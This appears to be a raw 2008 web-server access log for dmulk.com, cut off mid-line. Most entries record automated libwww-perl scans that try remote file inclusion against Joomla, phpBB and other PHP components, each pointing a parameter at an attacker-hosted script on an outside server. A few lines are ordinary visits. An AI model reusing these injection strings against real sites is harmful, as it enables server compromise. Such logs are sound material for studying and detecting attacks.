121.78.116.71 - - [16/May/2008:12:26:55 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:26:58 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:26:59 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:27:03 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:12:27:24 -0700] "GET /logs/?mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 200 47699 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:12:27:32 -0700] "GET /?mosConfig_absolute_path=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:27:35 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:27:35 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:27:36 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:27:39 -0700] "GET /logs/access_071103.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:27:49 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:12:27:50 -0700] "GET /retreat1/webcam/retreat1_00025.jpg HTTP/1.1" 200 43472 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:27:50 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:27:51 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:12:28:15 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:12:28:15 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:12:28:15 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.123.76 - - [16/May/2008:12:28:21 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:12:28:33 -0700] "GET /retreat1/webcam/retreat1_00030.jpg HTTP/1.1" 200 34635 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
63.246.154.12 - - [16/May/2008:12:28:45 -0700] "GET /logs/access_080308.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.21.85.101 - - [16/May/2008:12:28:46 -0700] "GET /logs//editor.php?root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [16/May/2008:12:28:47 -0700] "GET //editor.php?root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.27 - - [16/May/2008:12:28:54 -0700] "GET /logs/access_080308.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:28:56 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:28:59 -0700] "GET /logs/access_080111.log//modules/vwar/admin/admin.php?vwar_root=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:12:29:01 -0700] "GET /logs//main.php?sayfa=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [16/May/2008:12:29:02 -0700] "GET //main.php?sayfa=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:29:05 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:29:05 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:29:06 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:29:17 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:29:18 -0700] "GET /phphtml.php?htmlclass_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:29:18 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
65.127.142.211 - - [16/May/2008:12:29:31 -0700] "GET /funny/ HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:31 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:32 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:32 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:12:29:37 -0700] "GET /retreat1/webcam/retreat1_00156.jpg HTTP/1.1" 200 47444 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
65.127.142.211 - - [16/May/2008:12:29:42 -0700] "GET / HTTP/1.1" 200 11606 "http://www.dmulk.com/funny/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
65.127.142.211 - - [16/May/2008:12:29:45 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:46 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:46 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:47 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:47 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:48 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:12:29:48 -0700] "GET //orderSuccess.inc.php?glob=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:29:48 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.127.142.211 - - [16/May/2008:12:29:51 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
65.127.142.211 - - [16/May/2008:12:29:51 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 196608 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
194.177.96.168 - - [16/May/2008:12:29:59 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:12:30:02 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:12:30:03 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:12:30:03 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:12:30:05 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:12:30:05 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:12:30:09 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:30:10 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:12:30:11 -0700] "GET /logs//main.php?sayfa=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [16/May/2008:12:30:11 -0700] "GET //main.php?sayfa=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.166.35.71 - - [16/May/2008:12:30:15 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:30:15 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:30:18 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.52 - - [16/May/2008:12:30:21 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.112.52 - - [16/May/2008:12:30:21 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:12:30:26 -0700] "GET /xfsection/modify.php?dir_module=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:12:30:27 -0700] "GET /logs/xfsection/modify.php?dir_module=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:31 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:32 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:32 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:30:35 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:46 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:47 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:12:30:47 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:47 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:47 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:48 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:30:51 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:30:54 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:30:55 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:30:57 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:30:58 -0700] "GET /phphtml.php?htmlclass_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:30:59 -0700] "GET /logs/phphtml.php?htmlclass_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:31:01 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:31:02 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.76.181 - - [16/May/2008:12:31:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/hostings/idKORN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.76.181 - - [16/May/2008:12:31:11 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/hostings/idKORN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:31:28 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.149.101 - - [16/May/2008:12:31:36 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
88.84.149.101 - - [16/May/2008:12:31:36 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
65.127.142.211 - - [16/May/2008:12:31:37 -0700] "GET /funny/?M=A HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:31:38 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:31:39 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:31:44 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:31:44 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:31:44 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:31:44 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:31:45 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:31:45 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:31:48 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:31:48 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.52 - - [16/May/2008:12:31:48 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.112.52 - - [16/May/2008:12:31:48 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:31:49 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:31:49 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:31:50 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:31:50 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:12:31:54 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:12:31:55 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:31:58 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.72.112.52 - - [16/May/2008:12:32:02 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.103.23.40 - - [16/May/2008:12:32:03 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://watchvitality.com/v1/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.52 - - [16/May/2008:12:32:03 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.103.23.40 - - [16/May/2008:12:32:03 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://watchvitality.com/v1/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:32:06 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:32:11 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_